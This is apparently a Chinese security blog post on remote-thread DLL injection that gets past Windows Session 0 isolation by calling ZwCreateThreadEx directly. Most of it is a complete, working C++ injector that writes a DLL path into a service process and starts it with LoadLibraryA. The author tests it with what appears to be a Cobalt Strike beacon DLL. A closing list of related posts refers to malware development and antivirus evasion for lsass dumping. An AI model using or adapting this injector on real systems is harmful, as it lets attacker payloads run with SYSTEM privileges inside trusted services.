远程线程注入突破SESSION 0

SESSION 0 隔离

在Windows XP、Windows Server 2003,以及更老版本的Windows操作系统中,服务和应用程序使用相同的会话(Session)运行,而这个会话是由第一个登录到控制台的用户启动的。该会话就叫做Session 0,如下图所示,在Windows Vista之前,Session 0不仅包含服务,也包含标准用户应用程序。

将服务和用户应用程序一起在Session 0中运行会导致安全风险,因为服务会使用提升后的权限运行,而用户应用程序使用用户特权(大部分都是非管理员用户)运行,这会使得恶意软件以某个服务为攻击目标,通过“劫持”该服务,达到提升自己权限级别的目的。

从Windows Vista开始,只有服务可以托管到Session 0中,用户应用程序和服务之间会被隔离,并需要运行在用户登录到系统时创建的后续会话中。例如第一个登录的用户创建 Session 1,第二个登录的用户创建Session 2,以此类推,如下图所示。

突破SESSION 0

ZwCreateThreadEx函数可以突破SESSION 0 隔离,将DLL注入到SESSION 0 隔离的系统服务进程中。CreateRemoteThread底层实际上也是通过ZwCreateThreadEx函数实现线程创建的。CreateRemoteThread注入系统进程会失败的原因是因为调用ZwCreateThreadEx创建远程线程时,第七个参数CreateThreadFlags为1。

使用CreateRemoteThread注入失败DLL失败的关键在第七个参数CreateThreadFlags, 他会导致线程创建完成后一直挂起无法恢复进程运行,导致注入失败。而想要注册成功,把该参数的值改为0即可。

ZwCreateThreadEx

ZwCreateThreadEx在 ntdll.dll 中并没有声明,所以我们需要使用 GetProcAddress 从 ntdll.dll 中获取该函数的导出地址。

我们需要注意的是64位和32位中,函数定义还不一样

64 位下,ZwCreateThreadEx 函数声明为:

DWORD WINAPI ZwCreateThreadEx(

        PHANDLE ThreadHandle,

        ACCESS_MASK DesiredAccess,

        LPVOID ObjectAttributes,

        HANDLE ProcessHandle,

        LPTHREAD_START_ROUTINE lpStartAddress,

        LPVOID lpParameter,

        ULONG CreateThreadFlags,

        SIZE_T ZeroBits,

        SIZE_T StackSize,

        SIZE_T MaximumStackSize,

        LPVOID pUnkown);

32 位下,ZwCreateThreadEx 函数声明为:

DWORD WINAPI ZwCreateThreadEx(

        PHANDLE ThreadHandle,

        ACCESS_MASK DesiredAccess,

        LPVOID ObjectAttributes,

        HANDLE ProcessHandle,

        LPTHREAD_START_ROUTINE lpStartAddress,

        LPVOID lpParameter,

        BOOL CreateSuspended,

        DWORD dwStackSize,

        DWORD dw1,

        DWORD dw2,

        LPVOID pUnkown);

编码实现

#include <Windows.h>

#include <stdio.h>

#include <iostream>

void ShowError(const char* pszText)

{

	char szErr[MAX_PATH] = { 0 };

	::wsprintf(szErr, "%s Error[%d]\n", pszText, ::GetLastError());

	::MessageBox(NULL, szErr, "ERROR", MB_OK);

}

// 使用 ZwCreateThreadEx 实现远线程注入

BOOL ZwCreateThreadExInjectDll(DWORD PID,const char* pszDllFileName)

{

	HANDLE hProcess = NULL;

	SIZE_T dwSize = 0;

	LPVOID pDllAddr = NULL;

	FARPROC pFuncProcAddr = NULL;

	HANDLE hRemoteThread = NULL;

	DWORD dwStatus = 0;

	//打开注入进程,获取进程句柄

	hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);

	if (hProcess == NULL) {

		printf("OpenProcess Error");

		return -1 ;

	}

	//在注入的进程申请内存地址

	dwSize = 1 + ::lstrlen(pszDllFileName);

	pDllAddr = ::VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);

	if (NULL == pDllAddr)

	{

		ShowError("VirtualAllocEx");

		return FALSE;

	}

	//写入内存地址

	if (FALSE == ::WriteProcessMemory(hProcess, pDllAddr, pszDllFileName, dwSize, NULL))

	{

		ShowError("WriteProcessMemory");

		return FALSE;

	}

	//加载ntdll

	HMODULE hNtdllDll = ::LoadLibrary("ntdll.dll");

	if (NULL == hNtdllDll)

	{

		ShowError("LoadLirbary");

		return FALSE;

	}

	// 获取LoadLibraryA函数地址

	pFuncProcAddr = ::GetProcAddress(::GetModuleHandle("Kernel32.dll"), "LoadLibraryA");

	if (NULL == pFuncProcAddr)

	{

		ShowError("GetProcAddress_LoadLibraryA");

		return FALSE;

	}

#ifdef _WIN64

	typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(

		PHANDLE ThreadHandle,

		ACCESS_MASK DesiredAccess,

		LPVOID ObjectAttributes,

		HANDLE ProcessHandle,

		LPTHREAD_START_ROUTINE lpStartAddress,

		LPVOID lpParameter,

		ULONG CreateThreadFlags,

		SIZE_T ZeroBits,

		SIZE_T StackSize,

		SIZE_T MaximumStackSize,

		LPVOID pUnkown);

#else

	typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(

		PHANDLE ThreadHandle,

		ACCESS_MASK DesiredAccess,

		LPVOID ObjectAttributes,

		HANDLE ProcessHandle,

		LPTHREAD_START_ROUTINE lpStartAddress,

		LPVOID lpParameter,

		BOOL CreateSuspended,

		DWORD dwStackSize,

		DWORD dw1,

		DWORD dw2,

		LPVOID pUnkown);

#endif

	//获取ZwCreateThreadEx函数地址

	typedef_ZwCreateThreadEx ZwCreateThreadEx = (typedef_ZwCreateThreadEx)::GetProcAddress(hNtdllDll, "ZwCreateThreadEx");

	if (NULL == ZwCreateThreadEx)

	{

		ShowError("GetProcAddress_ZwCreateThread");

		return FALSE;

	}

	// 使用 ZwCreateThreadEx 创建远线程, 实现 DLL 注入

	dwStatus = ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)pFuncProcAddr, pDllAddr, 0, 0, 0, 0, NULL);

	if (NULL == hRemoteThread)

	{

		ShowError("ZwCreateThreadEx");

		return FALSE;

	}

	// 关闭句柄

	::CloseHandle(hProcess);

	::FreeLibrary(hNtdllDll);

	return TRUE;

}

int main(int argc, char* argv[])

{

#ifdef _WIN64

	BOOL bRet = ZwCreateThreadExInjectDll(8, "C:\\Users\\xx\\Desktop\\pwn\\artifact64.dll");

#else

	BOOL bRet = ZwCreateThreadExInjectDll(atoi(argv[1]), argv[2]);

#endif

	if (FALSE == bRet)

	{

		std::cout << "Inject Dll Error.\n";

	}

	std::cout << "Inject Dll OK.\n";

	return 0;

}

在这如果想通过MessageBox判断是否注入成功,那么会大失所望。由于会话隔离,在系统程序中不能显示程序窗体,也不能用常规方式来建立用户进程。所以这里使用CS生成的dll来判断DLL是否注入成功。

前面用MessageBox来判断踩坑了。

步骤总结

  1. 打开注入进程,获取进程句柄
  2. 在注入的进程申请内存地址
  3. 写入内存地址
  4. 加载ntdll,获取LoadLibraryA函数地址
  5. 获取ZwCreateThreadEx函数地址
  6. 使用 ZwCreateThreadEx 创建远线程, 实现 DLL 注入

坑点总结

  1. 需要使用管理员权限

  2. 进程注入dll使用MessageBox,会显示不了。因为系统程序中不能显示程序窗体

  3. ZwCreateThreadEx的函数定义在32和64位的不一样

远程线程注入突破SESSION 0的更多相关文章

  1. 远程线程注入dll,突破session 0

    前言 之前已经提到过,远线程注入和内存写入隐藏模块,今天介绍突破session 0的dll注入 其实今天写这个的主要原因就是看到倾旋大佬有篇文章提到:有些反病毒引擎限制从lsass中dump出缓存,可 ...

  2. 远程线程注入DLL突破session 0 隔离

    远程线程注入DLL突破session 0 隔离 0x00 前言 补充上篇的远程线程注入,突破系统SESSION 0 隔离,向系统服务进程中注入DLL. 0x01 介绍 通过CreateRemoteTh ...

  3. 恶意软件开发——突破SESSION 0 隔离的远线程注入

    一.前言 在Windows XP,Windows Server 2003以及更早的版本中,第一个登录的用户以及Windows的所有服务都运行在Session 0上,这样的做法导致用户使用的应用程序可能 ...

  4. 远程线程注入DLL

    远程线程注入 0x00 前言 远程线程注入是一种经典的DLL注入技术.其实就是指一个新进程中另一个进程中创建线程的技术. 0x01 介绍 1.远程线程注入原理 画了一个图大致理解了下远程线程注入dll ...

  5. windows-CODE注入(远程线程注入)

    远程线程注入(先简单说,下面会详细说)今天整理下代码注入(远程线程注入),所谓代码注入,可以简单的理解为是在指定内进程里申请一块内存,然后把我们自己的执行代码和一些变量拷贝进去(通常是以启线程的方式) ...

  6. 安全之路 —— 借助DLL进行远程线程注入实现穿墙与隐藏进程

    简介        大多数后门或病毒要想初步实现隐藏进程,即不被像任务管理器这样典型的RING3级进程管理器找到过于明显的不明进程,其中比较著名的方法就是通过远程线程注入的方法注入将恶意进程的DLL文 ...

  7. 安全之路 —— 无DLL文件实现远程线程注入

    简介         在之前的章节中,笔者曾介绍过有关于远程线程注入的知识,将后门.dll文件注入explorer.exe中实现绕过防火墙反弹后门.但一个.exe文件总要在注入时捎上一个.dll文件着 ...

  8. 详细解读:远程线程注入DLL到PC版微信

    一.远程线程注入的原理 1.其基础是在 Windows 系统中,每个 .exe 文件在双击打开时都会加载 kernel32.dll 这个系统模块,该模块中有一个 LoadLibrary() 函数,可以 ...

  9. mfc HackerTools远程线程注入

    在一个进程中,调用CreateThread或CreateRemoteThreadEx函数,在另一个进程内创建一个线程(因为不在同一个进程中,所以叫做远程线程).创建的线程一般为Windows API函 ...

随机推荐

  1. Blazor 模板化组件开发指南

    翻译自 Waqas Anwar 2021年4月15日的文章 <A Developer's Guide To Blazor Templated Components> [1] 在我之前的一篇 ...

  2. Goland 这些技巧,学会开发效率翻倍!

    hi, 大家好,我是 hhf. <Goland 这些实操技巧,你可能还不会!>介绍了日常开发中一些比较好用的技巧.本篇文章继续介绍一些其他比较好用的技巧. 自定义结构 tag Goland ...

  3. vim编辑文件时[O]pen Read-Only, (E)dit anyway, (R)ecover, (D)elete it, (Q)uit, (A)bort:

    ​​ ​ ​ 出现这个问题是因为你上次编辑的时候在没有保存的情况下退出了(如:电脑关机等)也有可能是有其他人在和你同时进行编辑行为(不同会话中).这是因为在用vim编辑的时候,vim会在打开文件目录下 ...

  4. STM32—SPI读写FLASH

    目录 FLASH简介 W25Q64 W25Q64简介 FLASH控制指令 FLASH内部存储结构 代码讲解 读取芯片ID 发送写使能信号 等待FLASH不忙 擦除扇区 写入数据 读取数据 注 FLAS ...

  5. 奇思妙想 CSS 3D 动画 | 仅使用 CSS 能制作出多惊艳的动画?

    本文将从比较多的方面详细阐述如何利用 CSS 3D 的特性,实现各类有趣.酷炫的动画效果.认真读完,你将会收获到: 了解 CSS 3D 的各种用途 激发你新的灵感,感受动画之美 对于提升 CSS 动画 ...

  6. .Net Framwork /.Net Core 发布为NuGet包

    一.使用NuGet发布包 下载NuGet命令行工具: https://dist.nuget.org/win-x86-commandline/v5.8.0/nuget.exe 下载NuGet Packa ...

  7. ASP.Net Core Web Api 使用 IdentityServer4 最新版 踩坑记录

    辅助工具 日志追踪包 : Serilog.AspNetCore 源码查看工具 : ILSpy 项目环境 ###: ASP.NetCore 3.1 IdentityServer4 4.0.0+ 主题内容 ...

  8. 2018.7.31-2018.8.2记:关于maven

    maven的使用,用得好,则省力省事,但是用不好则会造成一堆莫名其妙的错误,maven在使用的时候,jar包下载异常终止尤为需要注意,很容易就终止了,并且会出现一些下载出空jar包的情况,即:jar包 ...

  9. php ltrim() rtrim() trim()删除字符空格

    php$str=" 去除前后空格 ";echo "方括号中为原始字符串:[".$str."]";echo "原始字符串长度:&qu ...

  10. 为开源项目 go-gin-api 增加后台任务模块

    目录 任务管理界面 (WEB) 任务调度器 任务执行器 小结 推荐阅读 任务管理界面 (WEB) 支持在 WEB 界面 中对任务进行管理,例如:新增任务.编辑任务.启用/禁用任务.手动执行任务 等. ...